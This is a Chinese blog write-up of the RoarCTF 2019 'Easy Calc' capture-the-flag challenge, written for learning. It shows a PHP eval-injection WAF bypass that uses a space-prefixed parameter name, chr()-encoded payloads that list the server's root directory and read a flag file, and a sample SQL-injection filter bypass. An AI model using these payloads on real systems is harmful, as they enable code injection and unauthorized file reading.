RoarCTF 2019 Easy Calc 1BUUCFT表达式注入

Posted 2020-12-18 borber

首先 一看到名字 就去搜索了 Calc注入 想通过知识点 自己完成 而不是 跟着题解走

然后 看文章

1. 表达式注入

   同步测试:

   找到api: http://node3.buuoj.cn:28564/calc.php GET 参数: num

   测试 1*2 返回 2

   然后发现毫无卵用

乖乖搜题解

RoarCTF 2019 Easy Calc

这是别人对PHP字符串解析漏洞的理解，
我们知道PHP将查询字符串（在URL或正文中）转换为内部$_GET或的关联数组 $_POST。例如：/?foo=bar变成Array([foo] => “bar”)。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：

/news.php?%20news[id%00=42"+AND+1=0–

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：

1.删除空白符

2.将某些字符转换为下划线（包括空格）

chr() — 返回指定的字符

scandir() — 列出指定路径中的文件和目录

var_dump() — 打印变量的相关信息

file_get_contents() — 将整个文件读入一个字符串

通过上述四个函数 自己尝试写出 解 即 payload

首先 通过 chr(‘’) scandir() 搜寻目录

输入 _num下划线为 空格 scandir(chr("47")); 时 返回 what are you want to do? 有防火墙

再次查找题解 通过这一篇 发现可以直接访问 该api的php源码 故查看源码

<?php
error_reporting(0);
if(!isset($_GET[‘num‘])){
    show_source(__FILE__);
}else{
        $str = $_GET[‘num‘];
        $blacklist = [‘ ‘, ‘	‘, ‘
‘, ‘
‘,‘‘‘, ‘"‘, ‘`‘, ‘[‘, ‘]‘,‘$‘,‘\‘,‘^‘];
        foreach ($blacklist as $blackitem) {
                if (preg_match(‘/‘ . $blackitem . ‘/m‘, $str)) {
                        die("what are you want to do?");
                }
        }
        eval(‘echo ‘.$str.‘;‘);
}
?>

发现 ‘ 和 “ 都被屏蔽了 但是 47 是个数字 就去除了 “” 再次尝试 返回 Array 没有显示具体内容 于是 想着可以使用 var_dump() 来打印

于是 这部分的解为

var_dump(scandir(chr(47)));

返回结果

array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }

可以找到 f1agg 通过本地检测 发现 时 数字 1 而非 字母 l 此时再次使用 file_get_contents() var_dump() chr() 打印该文件

var_dump(file_get_contents(chr(102).chr(49).chr(97).chr(103).chr(103))) 等价 var_dump(file_get_contents("flagg"))

返回

bool(false) 

分析是路径问题 添加 /

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) 等价 var_dump(file_get_contents("/flagg"))

返回

string(43) "flag{926add2b-70f3-435c-83e9-9538b58b9730} "

PHP的基础知识 … 就这么学吧 哎